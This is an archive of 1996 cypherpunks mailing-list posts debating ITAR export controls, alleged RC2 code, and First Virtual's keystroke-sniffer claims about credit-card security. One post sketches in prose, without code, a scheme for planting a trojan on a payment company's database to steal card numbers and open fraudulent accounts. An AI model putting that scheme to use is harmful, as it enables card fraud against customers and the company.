Nathaniel Borenstein <nsb@fv.com>
Chief Scientist, First Virtual Holdings
FAQ & PGP key: nsb+faq@nsb.fv.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Wed, 31 Jan 1996 07:53:32 +0800
To: Raph Levien <raph@c2.org>
Subject: Re: Vladimir: put up or shut up
In-Reply-To: <Pine.SUN.3.91.960129162111.27262B-100000@infinity.c2.org>
Message-ID: <199601301947.LAA04349@netcom18.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>Most of the recent cypherpunks traffic from Vladimir has been a 
>reiteration of the position that discussing ITAR is bad because it 
>discourages cypherpunks from releasing good crypto software.

excuse me, but you seem to be implying I am somehow responsible for
"cypherpunk traffic" S/N. I have posted only a few messages recently.
also, this is a mischaracterization of my position. (gad, why do I always
have to reiterate something so trivial). my point is that if ITAR
is discussed, at least, I would like to see caveats and encouragement
in the same message by everyone here to challenge it.

>Well, here's one cypherpunks who recently released some software, and
>futhermore did so making significant (some might say extreme) concessions
>to the ITAR rules. I made the software available only on an 
>export-restricted Web server, and asked explicitly several times for it 
>not to be exported.

congratulate yourself for doing NSA's job so well, and following the letter
of the law so meticulously!!

> If my timezone math works out right, it took about 
>half an hour for it to be available on utopia. The ITAR did _nothing_ to 
>stop, or even slow down, the reease of my software.

"export restricted Web server"? "ask several times for it not to be
exported"? are you, or are you not, following the ITAR? or perhaps you
want to have your cake and eat it too?

>Why is it, then, that we still don't have usable strong crypto tools?  I'd
>say the reason is complex, much more so than could be explained by a
>simple conspiracy theory or even too much discussion of ITAR. 

for example, consider the idea that MS refuses to sign outside crypto
packages because merely *signing* them would somehow violate the ITAR.
I consider this a very good example. where is this law? even if it were
a law, what kind of bonehead would give it legitimacy by following it?
if you want to hang yourself, fine, go ahead, but please do not publicly
question where the rope is coming from.

>The main
>reason is that it is very damned hard to write good crypto-enabled
>applications.  Trust me, I know. I have done the best I could with the
>software I released, but I'm still quite frustrated with its limitations,
>especially with respect to nontechnical users. 

it is hard for *one*individual* to write a good crypto application. again,
cypherpunk bias/mindset/prejudice. it is far easier for a large company
to do so. maybe cpunks should reconsider their antagonism to "any organized
group of people larger than 2". Netscape had no problem peppering the world
with crypto, and they are advancing nicely. I am suggesting the logical
next step: a company openly ignore the ITAR crypto sections.

>Ultimately, to create really good crypto-enabled applications, it's going 
>to take money. And there's where ITAR is most effective. If the powers 
>that be disapprove of your software, then there goes your foreign market. 

"powers that be". a faceless bogeyman I don't believe in. sorry to challenge
your religion of fear and powerlessness. there are major big companies,
*lists* of them, that want to export crypto. why not try to persuade
MS to sign foreign packages, to import them, or whatever? answer: because
cypherpunks like to pretend they are powerless.

>There go your government sales. There go those "strategic alliances" with 
>the other companies in the market, because the pressure can be applied 
>transitively too. ITAR is actually only a small part of the process.

that's right. FEAR is the basic part of the process. as long as you help
support that framework of fear, NOTHING WILL CHANGE. when someone openly
defies the ITAR and nothing happens, or an actual court case emerges,
the spread of crypto will be immensely facilitated.

>Still, free software has a lot of vitality left in it. It's still strong 
>at blazing new trails in software design. Where it's weak (and this is 
>what really counts now), is being usable, easy to learn, and easy to 
>install. I think if we explicitly work towards these goals, there's hope 
>for great free crypto-enabled applications. Hell, PGP came pretty close, 
>and it's saddled with all kinds of lousy design decisions.

look, I really respect your own software capabilities. but my main thesis,
which you appear to agree with, is that "guerilla crypto programmers" can
only get so far. there are some logical next steps. but because of 
"one individualitis" bias on this list, they are always roundly dismissed.

>But back to Vladimir: instead of whining at us about how our fear of the
>law is hurting the acievement of our goals, why don't _you_ write that
>killer crypto-app and distribute it to the world? Who's stopping you? 

no one is stopping me from *distributing* any software, nor from writing
it. I don't think the problem is a shortage of inspired programmers as you
nicely demonstrate. the problem is the aura of fear associated with those
programmers unleashing their full creativity on the problem, esp. those
inside companies. and my point
is that laws do not create fear. the programmers are responsible for their
own fears. we can help eradicate that fear by egging them on. does anyone
really believe anything bad will happen to individual programmers? don't
you see that if anything did, how much it would win for *our* cause?
"sometimes you win by losing, and lose by winning".

your bias again shows: "what is preventing us from succeeding is finding
a lone programmer who writes that killer app that spreads around the world".
that's blatantly specious in my opinion. the killer apps such as the MS
crypto toolkit, various apple products, and Netscape, Eudora, etc. 
exist *now*. the trick is to encourage the 
companies to put strong crypto in them, and to say to Hell with the ITAR,
and accept a court challenge as an important part of the battle. you 
will not get that result by endlessly reiterating why even THINKING about
doing so is prevented by the ITAR. you will sabotage that result.

imho, the period of the lone programmer writing a killer app is over with.
I believe that PGP is going to start a slow slide into obscurity at this
point unless Zimmermann links it to some major vehicle like a web browser
or wysiwig mail program. 

of course I know what I write is blasphemous. of course it sounds contrary
to the basic philosophies on this list. but how far have these philosophies
gotten the cpunk "movement"?? look around you, and ask yourself if your
tactics are succeeding.

p.s. thanks for taking me seriously.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Wed, 31 Jan 1996 08:01:09 +0800
To: cypherpunks@toad.com
Subject: Re: New Mailing List (encrypted)
Message-ID: <2.2.32.19960130195856.00951320@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:21 AM 1/30/96 -0800, anonymous-remailer@shell.portal.com wrote:
>On Sat, 13 Jan 1996 13:42:49 -0600, <perry@vishnu.alias.net> wrote:
>
>>	I have installed PGPdomo on vishnu.alias.net. I've also
>>created a new mailing list that you can join if you wish. It's a
>>closed mailing list, so subscriptions must be approved. What makes
>
>If we have attempted to subscribe, but received no response, does that 
>mean that we didn't get approved?  If so, how can we "qualify"?

I have noticed that the software they are using is VERY picky about he
formatting of the request and how it is encoded in PGP.  To get it to work,
I had to use the EXACT instructions posted to get it to subscribe.

The PGPMajordomo software is a great idea, but in practice it has not been
that fun to use.  The biggest problem has been that the mail client I use
does not do PGP that well.  Hopefully the state of E-Mail support for PGP
will change.

Another project to add to the list...

Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
         Is the operating system half NT or half full?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael J Gebis <gebis@ecn.purdue.edu>
Date: Wed, 31 Jan 1996 03:27:52 +0800
To: cypherpunks@toad.com
Subject: Re: RC2 code on sci.crypt
Message-ID: <199601301702.MAA04511@purcell.ecn.purdue.edu>
MIME-Version: 1.0
Content-Type: text


Alex Strasheim <cp@proust.suba.com> wrote:
> > For those not paying attention, there is RC2 code on sci.crypt.  RSADSI
> > is acting as if it is real, and will publish some legal posturing about
> > it real soon now.  
> 
> On sci.crypt Bruce said it was a crummy algorithm...

What he actually said was, "It's not obviously a lousy algorithm," or
something like that.  I took this to mean, "in the few hours I've had
to look at the code, I have not spotted any obvious problems."

He couldn't say, "It's obviously not junk," because non-junkiness is
never obvious.

-- 
Mike Gebis  gebis@ecn.purdue.edu 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ted Anderson <ota+@transarc.com>
Date: Wed, 31 Jan 1996 03:32:32 +0800
To: cypherpunks@toad.com
Subject: No FV supporters?
In-Reply-To: <Pine.BSD/.3.91.960130094017.9580A-100000@l0pht.com>
Message-ID: <sl3Z0jWSMV0_0L0U40@transarc.com>
MIME-Version: 1.0
Content-Type: text/plain


I am rather shocked that after wading through hundreds of msgs of abuse
of Nathaniel and FV I haven't seen one message of support; but perhaps I
missed it.

I agree that the original post seemed very self-serving and was poorly
worded for this audience.  However, that doesn't excuse people from
reading it carefully and thinking about the implications.  FV has argued
time and again that their basic strength is that CC number aren't
available for systematic secretive purloinage.  The concern about
collecting CC# on a large scale is one of the argument given for the
importance of using encryption throughout the internet.  Otherwise
tapping the internet backbone has much the same properties.  I thought
we had already agreed that dumpster diving is a fundamentally smaller
threat to the CC system than backbone tapping.  FV is just pointing out
that another systematic weakness exists in the CC/internet scheme.

Whether this is a new, serious concern for internet commerce seems to be
a useful and important topic for discussion.  Fortunately, the
discussion, acrimonious as it has been has produced fruit.  It looks
like Weld Pond's suggestion of using a random imagemap is an effective
antidote.  Making the attack harder by an order of magnitude at least.

Ted Anderson




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <ptrei@acm.org>
Date: Wed, 31 Jan 1996 03:23:50 +0800
To: <cypherpunks@toad.com
Subject: Re: FV's Borenstein discovers keystroke capture programs! (
Message-ID: <9601301705.AA28831@toad.com>
MIME-Version: 1.0
Content-Type: text/plain



 In <kl3Wc7OMc50eRIr810@nsb.fv.com> "Nathaniel Borenstein" wrote:

> We have a few pages of C code that scan everything you type on a
> keyboard, and selects only the credit card numbers.  How easy is that to
> do with credit card numbers spoken over a telephone?

------------------------------------------------------------------------------------
In: <sl3SprmMc50eAWY4U=@nsb.fv.com> "Nathaniel Borenstein" wrote:

>I used to trust the telephone not to be tapped in a selective way based on
>keyword recognition, but in recent years, with the improvement in voice
>recognition technology, I have stopped trusting it that way, and I know
>plenty of other people have too -- if you say "NSA" into a cellular call,
>you are probably inviting an eavesdropper.
--------------------------------------------------------------------------------------------
 
Can you make up your mind, please? Do you regard automated 
voice recognition as a threat to your privacy, or not? Is there
some reason you think it's lot easier to recognize a spoken "NSA"
than "Three One Four One Five Nine Two Six Five Four"?

Consistancy is a wonderful thing - you should try it sometime.


		speaking strictly for myself

			Peter Trei
			ptrei@acm.org

PS: I've kept a log of this whole silly thread. It will not be forgotten.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Inverardi@abacus.ch (Remo Inverardi)
Date: Tue, 30 Jan 1996 19:48:26 +0800
To: cypherpunks@toad.com
Subject: FV Security Holes (?)
Message-ID: <1996Jan30.122032.1590.1040@abainet.abacus.ch>
MIME-Version: 1.0
Content-Type: text/plain


 Received: from relay3.UU.NET by abainet.abacus.ch
   (PostalUnion/SMTP(tm) v2.1.8d for Windows NT(tm))
   id AA-1996Jan30.114852.1590.835; Tue, 30 Jan 1996 11:48:55 GMT
 Received: from toad.com by relay3.UU.NET with SMTP
  id QQaasw09854; Tue, 30 Jan 1996 05:40:13 -0500 (EST)
 Received: by toad.com id AA18530; Tue, 30 Jan 96 02:27:35 PST
 Received: from fuqua.fiftysix.org by toad.com id AA18520; Tue, 30 Jan 96 
 02:27:18 PST
 Received: (from mixmaster@localhost) by fuqua.fiftysix.org (8.6.12/8.6.9) id 
 EAA17459; Tue, 30 Jan 1996 04:25:02 -0600
 Date: Tue, 30 Jan 1996 04:25:02 -0600
 
 > I believe that FV works by assigning the user some sort of id number. > 
 > They send the id accross the net, FV has a database with "FV-ID" <->
 > credit-card-number correspondences, the merchant sends FV the id, FV 
 > bills your card and pays the merchant.
 
 Ok now, so you can get one's FV-Number by simple eavesdropping? That 
 sounds just too easy to me. Does anybody have more detailed information 
 about FV and how it works?
 
 bye. iNVi.TF!


 ---------------------------------------------------------------------- 
 Remo Inverardi - Voice +41 61 811 14 82 - Fax and BBS +41 61 811 14 42 
 ABACUS Software Research AG - Rorschacherstr. 170 - CH-9006 St. Gallen 
 ----------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Wed, 31 Jan 1996 08:17:13 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: RE: FV Demonstrates Fatal Flaw in Software Encryption of Credi  tCards
Message-ID: <310E7DAE@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



On January 30, 1996 nsb[SMTP:nsb@nsb.fv.com] wrote:

>> Of course, since Federal law requires the credit card companies, not   
the
>> user, to pay the costs of fraud, First Virtual's entire premise is a   
red
>> herring.
>
>Actually, you're wrong here too.  It is the banks, not the credit card
>companies, that carry the risk.

Changing the subject doesn't change the point.  Your announcement implies   
that users are liable, and that is incorrect.  This is misleading, and in   
my view, reprehensible.  This was the point of my post.  The fact that   
the fraud is traceable when detected should have been self evident.

If your post has said "Financial Industry Should Watch out for Keyboard   
Sniffers" as a *potential* threat for which the risks should be weighed,   
that would have been different.  Arguably farfetched, but different.   
 Your post relies on people's ignorance of their rights with respect to   
credit card liability, and therefore is shameful.

dvw  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeremy Mineweaser <Jeremym@area1s220.residence.gatech.edu>
Date: Wed, 31 Jan 1996 03:48:31 +0800
To: cypherpunks@toad.com
Subject: Re: FV's Borenstein discovers keystroke capture programs!
Message-ID: <2.2.32.19960130172612.009bdbf4@area1s220.residence.gatech.edu>
MIME-Version: 1.0
Content-Type: text/plain


At 09:53 AM 1/30/96 -0500, Nathaniel Borenstein wrote:

>As to how the credit card numbers are entered:  they are entered at
>account setup time via a telephone call.

Then why should an attacker even bother to infect users' machines
with your program?  There is a much better way.  Let me outline it
for you:

The keyboard sniffer can be modified to attach to the computer
which holds your customer database.  It simply watches for card
numbers (which is even more trivial than doing so on the client's
machine, as it's the only thing this machine does) and stores them.
Then, when the attacker calls in to set up an account, the keyboard
sniffer is alerted (by any of several methods, such as a specific,
probably invalid, credit card number) and replaces this value with
a card number that was previously captured.  In this manner the
attacker has obtained a valid FV account drawn on a valid credit
card number of a real FV customer.  This account can then be
used to purchase various goods and services.  And while it causes
a similar degree of damage as your previous scheme, it also
causes you to lose money in the process.  Since you are the
verifier (in the function of the bank) in this case, then you will
lose out in the event of fraud.  The credit card companies will
still receive their money, and guess who will pay it:  FV!

This method has several other benefits over your previous scheme.
Your scheme required infection of numerous computers;
this scheme requires infecting only one computer.  And while
one may be held liable for the infection of the database computer,
the person who opens the fake FV account cannot.  All s/he has
done is call you up and follow procedure.  Even if he were dumb
enough (as we know many criminals are) to give you his real
card number over the telephone, it would not show up in your
database.  He would be completely clean... no trace.
Furthermore, once the rogue program is in place, EVERY attack
succeeds.

As a corollary to this attack, the attacker could design his/her
trojan to watch for the creation of new accounts and replace
the intended FV_ID with another value created by a PRNG
seeded by a known value.  The attacker can then seed his/her
copy of the PRNG with the same value and conduct valid
(although fraudulent) transactions using the generated FV_IDs.
With this approach he does not even have to contact your
new accounts office via telephone; s/he simply implants the
trojan and begins making transactions.  This is similar to the
above attack with regard to payment liability.

---
   Jeremy Mineweaser     | GCS/E d->-- s:- a--- C++(+++)$ ULC++(++++)>$ P+>++$
 j.mineweaser@ieee.org   | L+>++ E-(---)  W++ N+  !o-- K+>++  w+(++++) O-  M--
                         | V-(--) PS+(--) PE++ Y++>$ PGP++>+++$ t+() 5 X+ R+()
    *ai*vr*vx*crypto*    | tv(+)  b++>+++ DI+(++)  D+  G++ e>+++  h-() r-@ !y-





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 31 Jan 1996 05:24:20 +0800
To: Simon Spero <ses@tipper.oit.unc.edu>
Subject: Re: Alleged RC2
In-Reply-To: <9601301402.AA15555@alpha>
Message-ID: <9601301829.AA11121@alpha>
MIME-Version: 1.0
Content-Type: text/plain




Any ideas on whether the comment in the source about the "effective
key length" trick being an export control deal is true?

If there were a known version of this floating around known to have a
40-bit restriction, is it likely that the restriction would be done by
always supplying "40" as the "bits" parameter, or would be it by
simply limiting the user key length?

______c_____________________________________________________________________
Mike M Nally * Tivoli Systems * Austin TX   * I want more, I want more,
       m5@tivoli.com * m101@io.com          * I want more, I want more ...
      <URL:http://www.io.com/~m101>         *_______________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Van Wie <dvw@hamachi.epr.com>
Date: Wed, 31 Jan 1996 08:46:07 +0800
To: hua <hua@chromatic.com>
Subject: RE: FV Demonstrates Fatal Flaw in Software Encryption of Credi   tCards
Message-ID: <310E8117@hamachi>
MIME-Version: 1.0
Content-Type: text/plain



On January 30, 1996 hua[SMTP:hua@chromatic.com] wrote:

>> the credit card companies in detecting fraud and locating criminals is   
    

>> quite real.
>
>Retail clerks are not lone bandits.

My point is not that all retail clerks are bandits.  Most are   
trustworthy, but surely any long time CC user has given their card to   
someone who would rip them off if they thought they could get away with   
it.  My point is that CC #'s are not national security secrets, they are   
disclosed to potential adversaries regularly.

>> Of course, since Federal law requires the credit card companies, not   
the
>> user, to pay the costs of fraud, First Virtual's entire premise is a   
red
>> herring.  If the credit card companies are willing to take the risk,   
they
>> will (and are).
>
>Federal law does not require that a company stay in business once it
>has entered the banking market.

The point is FV's post relies on a frightening and false premise - that   
the users are exposed to one or more financial risks by FV's keyboard   
sniffer threat.

dvw




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 30 Jan 1996 20:13:00 +0800
To: cypherpunks@toad.com
Subject: RE: FV Demonstrates Fatal Flaw (Noise + Humour)
Message-ID: <199601301142.MAA08617@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


(Second year PR student press release crap deleted)

On 1/29/96 Nathaniel Borenstein preached the evils of Internet Commerce.......

NB> If your idea of "today's computer users" comes from cypherpunks, you're
NB> living in a dream world. FV's experience with average Internet users 
NB> includes some of us who ask us not to use complicated "technical terms" like
NB> "cut and paste".  Ther certainly can't be counted on to know which
NB> software to download and which to avoid.

I'd bet that one half learned to download and use Vueprint 4.3 and the other
half
are finishing up learning Mavis Beacon's Typing Tutor.

Later on in the day, Nate yacked that......

NB> This is fine for you and me.  But Internet commerce has to work for the
NB> hundreds of millions of non-technical consumers who are swarming onto
NB> the Internet.  If someone emails them a program that purports to show
NB> them pretty pictures (dirty movies?).....

Glad you are trying to market some of your other overpriced services, Point your
(Not THAT!!!) browser to:

http://www.infohaus.com/access/by-keyword

and pan down to the bottom of the page, Seems that every third service for
sale by
First Virtual is about sex. For instance......

adult advertising, amateur art, bisexual, cyberpunk (full of dating
services?!?) gay,
images, jpegjpg, lesbian literature, male marketing, nude, nudity,
pornography, sex,
singles, and on and on!

Send out a press release after Chaum has bought you guys out!

The Christmas Troll

--








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 31 Jan 1996 21:24:30 +0800
To: cypherpunks@toad.com
Subject: PoM 3: Angry Females
Message-ID: <199601301750.MAA18912@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Today's third article of The Washington Post series on "The
   Politics of Mistrust" is:

   "Angry Female Voters a Growing Force."

      Remember angry white males? Well, hear now from the
      women. They are more likely than men to have become
      anxious about the economy and distrustful of govermnent.
      But what separates men from women in this worried
      segment of the electorate is that they seem less
      concerned with their own plight than they are with the
      economic prospects for their children and their
      neighbors, including the poor.

   Next: The anti-government electorate.

   Series to date available at:

      http://www.replay.com/young/







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 31 Jan 1996 04:03:56 +0800
To: cypherpunks@toad.com
Subject: DRU_mup
Message-ID: <199601301752.MAA19218@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   1-30-96. TWP:

   "Defense Memo Warned of Israeli Spying."

      A DoD security office issued a confidential warning 
      in October that the Israeli government was 
      "aggressively" trying to steal U. S. military and 
      intelligence secrets, partly by using its "strong 
      ethnic ties" to the United States to recruit spies. 
      It described Israel as a "non-traditional adversary" 
      in the world of espionage, noting similar
      intelligence "threats" from other close allies such as
      France, Italy, Japan, Germany, and Britain.

   "Relaxed CIA Covert Action Rules Urged."

      A private, blue-ribbon task force is urging policymakers
      to consider allowing the CIA to resume sending out spies
      posing as American journalists or members of the clergy
      and lifting the ban on certain covert actions such as
      those designed to prevent terrorist attacks or support
      the overthrow of hostile regimes.


   DRU_mup












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Wed, 31 Jan 1996 05:55:00 +0800
To: cypherpunks@toad.com
Subject: Re: The FV Problem = A Press Problem
Message-ID: <ad33cbb800021004bab7@[132.162.233.188]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:03 AM 01/30/96, Timothy C. May wrote:
[...]
>But, it occurred to me, this is just part of the larger syndrom. Simson's
>article was practically written from the FV press release. While he
>interviewed some "security experts," clearly the timing of his article
>(this morning) and the announcement by Nathaniel of his discovery (this
>morning) suggests the cozy relationship involved.
>
>The larger syndrome is that software deals, alliances, mergers, and
>problems are all based on hype. Nathaniel Borenstein issues press releases,
>Sameer Parekh issues press releases, and maybe even I would issue press
>releases if only I knew how to.
[...]

I'd say _all_ news, not just software news, is P.R. controlled, these days.
You can largely hold Edward L. Bernays, the "father of public relations"
(who just died last year) responsible for that--or the societal conditions
that allowed Bernays to do his thing.  Bernays developed expertise in
"engineering of consent" turned the news into a commercialized and
manufactured commodity.  As the NYT magazine "people who died last year"
blurb on him said, maybe once you could trust that the news you read was
something that a reporter or editor independently decided was newsworthy.
Now, the news you read is manufactured in press releases to sell a product,
and is there because a well written press release convinced a reporter or
editor that a marketting ploy was actually a newsworthy event (or, perhaps,
because the advertising dollars that went along with the press release
convinced him).  Witness FVs demonstration of key capture becoming a
newsworthy event.

If you want to effect what's in the media, maybe you should learn how to
issue press releases.

> Journalists seem to love this, because the press releases write the
> stories. Companies like it, too, because they can get free newspaper
> space. Everyone is scratching each other's back.

Yup.   Throw the government into the mix too, and I think you've got a
pretty good model of the media.

--
"The conscious and intelligent manipulation of the organized habits and
opinions of the masses is an
important element in a democratic society. . . Those who manipulate this
unseen mechanism of
society constitute an invisible government which is the true ruling power
of our country."
-- Edward Bernays






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Oliver Huf <ohuf@relay.sedat.de>
Date: Tue, 30 Jan 1996 21:06:47 +0800
To: packrat@tartarus.uwa.edu.au
Subject: Re: The Big Lie
In-Reply-To: <199601301215.UAA00311@ratbox.rattus.uwa.edu.au>
Message-ID: <Pine.NXT.3.91.960130134605.8770D-100000@oe1>
MIME-Version: 1.0
Content-Type: text/plain




> Damn germans. I guess that they really haven't changed a hell of a lot
> over the past few decades. No wonder that every other European race
> (pretty much) sterotypes them.

You haven'n been in Germany for a very long time, have you?
... or in Europe at all?

ohuf.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Tue, 30 Jan 1996 23:05:06 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: "Concryption" Prior Art
In-Reply-To: <199601290832.AAA09285@ix10.ix.netcom.com>
Message-ID: <Pine.BSD.3.91.960130134153.9781A-100000@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 29 Jan 1996, Bill Stewart wrote:

> >>However the Con-cryption patent covers first compressing, then
> >>encrypting.
> >
> >Isn't that how PGP does its thing (first compress the data and then feed it
> >into the Encryption Stage)? PGP is prior art in-and-of-itself.

	no way is that patent valid. I have prior art going back into the
    early 80s where I converted the standard compress into a stream processor
    followed by a stream encryption engine --obviously the reverse as well.

	now, that's back in time when I had two 750s in my garage and 9T
    tape! I've had it on the list to find for some time; I still have
    two tape drives (one will hopefully still work) and an old uvaxen 
    which I saved for such emergencies. It also might be on tapes from 
    my then current desktop: a Sun 2!  

	At the moment, I'm not terribly interested in the problem, but
    will be, hopefully soon. Basically, if it comes to that, they had
    better have their act ready to pay litigative costs  --I do my own
    (with a perfect record, better than patent attorneys I have hired),
    and I rather enjoy playing by the rules of the law, rather than playing 
    by the game rules of the bar.

	and, I do not believe I am alone; there are others who have used 
    stream processing for that purpose.  I started playing with rsa 
    shortly after in was published in SA in 1977 --however, significant
    computing power was not cheap at that time --seems to me I paid
    about $30K for an 11-44 with 2 rl02 drives! 

> 
> Peter Wayner posted that the "new" thing about the way they do it is
> that it saves time by combining the steps.  But I think I've seen
> approximately the same done with arithmetic-coding compression?
> #--
> #				Thanks;  Bill
> # Bill Stewart, stewarts@ix.netcom.com, Pager/Voicemail 1-408-787-1281
> #
> # "Eternal vigilance is the price of liberty" used to mean us watching
> # the government, not the other way around....
> 

__________________________________________________________________________
    go not unto usenet for advice, for the inhabitants thereof will say:
      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

    To be a ruler of men, you need at least 12 inches....
    There is no safety this side of the grave.  Never was; never will be.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Wed, 31 Jan 1996 08:12:23 +0800
To: watson@tds.com
Subject: Re: your bogus post
In-Reply-To: <Pine.SOL.3.91.960130100318.10851A-100000@mailman.tds.com>
Message-ID: <199601302019.OAA11936@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> Seems to me the irresponsibile thing too many of our society do is put too
> much stock in the marketeers.  I usually select products on their merits,
> not on the marketing.  Maybe you do too.  But the marketing works, and
> companies have to use it to stay profitable. 

I don't think you can make a hard and fast rule about this sort of thing. 
The problem isn't just marketing hype.  The problem is that the claims fv
is making about competing systems border on misrepresentation. 

When a company does something you believe is unethical, what do you do?  
It depends on how much better their product is than the other guys', how 
badly you need it, and how offensive you find their actions.

I'm not as bothered by the incident as many here are;  I tend to attribute
it to panic on their part as it becomes increasingly clear that credit
card numbers transmitted via ssl web servers will be the first standard
for online commerce.

Marketing is important, and it can do a lot for a compnay.  But I don't
think it will be able to prop up fv over the long run.  Suppose you want
to buy some information off of a web page.  You can either give your cc
number via ssl, or go out and create a fv account, then come back and buy 
whatever it is you wanted.  Which one are you going to do?







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bob Rankin <bobrankin@mhv.net>
Date: Wed, 31 Jan 1996 07:19:23 +0800
To: Rishab Aiyer Ghosh <rishab@dxm.org>
Subject: Re: Domain hijacking, InterNIC loopholes
In-Reply-To: <9601301819.AA00964@toad.com>
Message-ID: <Pine.SOL.3.91.960130141653.13924D-100000@csbh>
MIME-Version: 1.0
Content-Type: text/plain


Rishab wrote: 

>On the other hand I know no case of domain hijacking
>actually taking place. 

I do.  The sysop at colossus.net told me this very thing happened to him
last fall.  I just can't believe this process is automated - I wonder what
would happen if someone hijacked internic.net!

Regards,
  Bob Rankin (BobRankin@MHV.net)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cme@cybercash.com (Carl Ellison)
Date: Wed, 31 Jan 1996 07:15:33 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: Crypto Exports, Europe, and Conspiracy Theories
Message-ID: <v02120d08ad341066ff7a@[204.254.34.231]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:06 1/26/96, Adam Shostack wrote:
>Timothy C. May wrote:
>
>| You have to ask yourself this question: "Why are there no cryptographically
>| strong products--finished products, not specific ciphers or chunks of
>| code--developed in Europe and freely imported into the U.S.?"
>
>	There are.  If you buy a Gauntlet Internet firewall from TIS,
>you can also buy a German T1 speed DES card for it.  I believe the
>code was written by TIS's London office.  The Israeli Firewall-1
>(version 2) firewall offers VPN (Virtual Private Networks) with some
>decent encryption scheme.

The German company is CE Infosys -- and they make a PCMCIA DES card also, BTW.
The PC card is a decent performer but I haven't tested speed (of the interface)
for the PCMCIA card.

The code driving the card was written in Glenwood MD.  The Gauntlet
uses normal SWIPE protocol.  It can not be exported at this time.

However, there is a plan afoot at TIS to produce a version of Gauntlet
with full 56-bit DES SWIPE -- but with TIS CKE added to the communication
stream and therefore making the product exportable.

For more information, you can check TIS's web page www.tis.com

 - Carl

+--------------------------------------------------------------------------+
| Carl M. Ellison   cme@acm.org     http://www.clark.net/pub/cme           |
| PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 |
|   "Officer, officer, arrest that man!  He's whistling a dirty song."     |
+----------------------------------------------------------- Jean Ellison -+






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Wed, 31 Jan 1996 09:52:49 +0800
To: trei@process.com
Subject: Re: FV's Borenstein discovers keystroke capture programs! (
In-Reply-To: <9601301705.AA28831@toad.com>
Message-ID: <Pine.SOL.3.91.960130142547.9060A-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


>  
> Can you make up your mind, please? Do you regard automated 
> voice recognition as a threat to your privacy, or not? Is there
> some reason you think it's lot easier to recognize a spoken "NSA"
> than "Three One Four One Five Nine Two Six Five Four"?
> 

Let's give it a try ...  (this is with a copy of DragonDictate 
Professional running on a Pentuim 90 with an IBM DSP card  
handling some of the work.  Not exactly cheap, but well within 
budget  for our purposes.)

3141592654. NSA.  That wasn't too bad now, was it?  Of course, the NSA
wasn't in the default vocabulary, but then again, neither was the NSO.  Is
this government censorship?

Now then, does anybody have a nice high quality radio bug we can stick 
on Nat's telephone?  Maybe we'll be able to  spoof their PR Agency, 
leaving them helpless :-)


Disclaimer: I have a huge amount of respect for all the individuals at 
first virtual; they're all greats from the field of Internet mail.  
However I think this biases them towards a mail based solution, even when 
this isn't the best way to tackle the job.  I'm disappointed that they 
have to stoop to this level in a desperate attempt to hold what seems to 
be an untenable market position, when there is so much important work 
they could all the doing.


Simon

> Consistancy is a wonderful thing - you should try it sometime.

  Consistency is also pretty good :-)

(at least with voice recognition, the typos are spectacularly   catfish   
wombat haddock).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 31 Jan 1996 09:52:09 +0800
To: CypherPunks@toad.com
Subject: Re: Lotus Notes
Message-ID: <v02120d06ad344e1513d5@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:09 1/30/96, Charlie_Kaufman/Iris.IRIS@iris.com wrote:

>p.s. re: the fact that it's 64 bits rather than 128. That was the limit on key
